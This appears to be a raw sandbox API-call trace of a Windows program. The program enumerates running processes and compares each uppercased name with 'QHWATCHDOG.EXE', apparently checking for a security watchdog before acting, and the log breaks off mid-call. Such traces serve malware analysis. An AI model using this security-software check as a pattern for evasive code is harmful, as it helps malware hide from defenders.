Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.055] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.055] lstrlenW (lpString="svchost.exe") returned 11 [0163.055] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.055] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.055] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.056] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.056] lstrlenW (lpString="svchost.exe") returned 11 [0163.056] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.056] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.056] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.057] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.057] lstrlenW (lpString="audiodg.exe") returned 11 [0163.057] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.057] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.057] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.057] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.057] lstrlenW (lpString="svchost.exe") returned 11 [0163.058] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.058] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.058] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.058] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.058] lstrlenW (lpString="svchost.exe") returned 11 [0163.058] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.058] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.058] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.059] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.059] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.059] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.059] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.059] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.060] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.060] lstrlenW (lpString="svchost.exe") returned 11 [0163.060] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.060] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.060] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.061] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.061] lstrlenW (lpString="taskhost.exe") returned 12 [0163.061] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.061] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.061] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.062] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.062] lstrlenW (lpString="taskeng.exe") returned 11 [0163.062] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.062] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.062] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.063] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.063] lstrlenW (lpString="dwm.exe") returned 7 [0163.063] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.063] lstrcmpW (lpString1="DWM.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.063] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.064] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.064] lstrlenW (lpString="explorer.exe") returned 12 [0163.064] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.064] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.064] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.065] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.065] lstrlenW (lpString="taskeng.exe") returned 11 [0163.065] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.065] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.065] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.065] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.065] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.065] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.066] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.066] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.066] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.066] lstrlenW (lpString="taskhost.exe") returned 12 [0163.066] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.066] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.066] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.067] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.067] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.067] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.067] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.067] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.068] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.068] lstrlenW (lpString="tri.exe") returned 7 [0163.068] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.068] lstrcmpW (lpString1="TRI.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.068] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.068] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.069] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.069] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.069] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.069] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.069] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.069] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.069] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.069] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.069] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.070] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.070] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.070] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.070] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.070] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.071] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.071] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.071] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.071] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.071] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.072] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.072] lstrlenW (lpString="isolation.exe") returned 13 [0163.072] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.072] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.072] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.073] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.073] lstrlenW (lpString="abc.exe") returned 7 [0163.073] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.073] lstrcmpW (lpString1="ABC.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.073] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.073] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.073] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.073] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.073] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.073] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.074] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.074] lstrlenW (lpString="english_performing.exe") returned 22 [0163.074] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.074] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.074] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.074] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.074] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.074] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.074] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.074] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.075] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.075] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.075] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.075] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.075] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.076] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.076] lstrlenW (lpString="volume.exe") returned 10 [0163.076] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.076] lstrcmpW (lpString1="VOLUME.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.076] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.076] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.076] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.076] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.076] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.076] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.077] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.077] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.077] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.077] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.077] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.078] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.078] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.078] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.078] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.078] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.079] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.079] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.079] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.079] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.079] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.079] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.079] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.079] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.079] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.079] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.080] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.120] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.120] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.120] lstrcmpW (lpString1="EXCEL.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.120] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.121] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.121] lstrlenW (lpString="svchost.exe") returned 11 [0163.121] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.121] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.121] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.122] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.122] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.122] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.122] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.122] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.123] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.123] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.123] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.123] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.123] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: 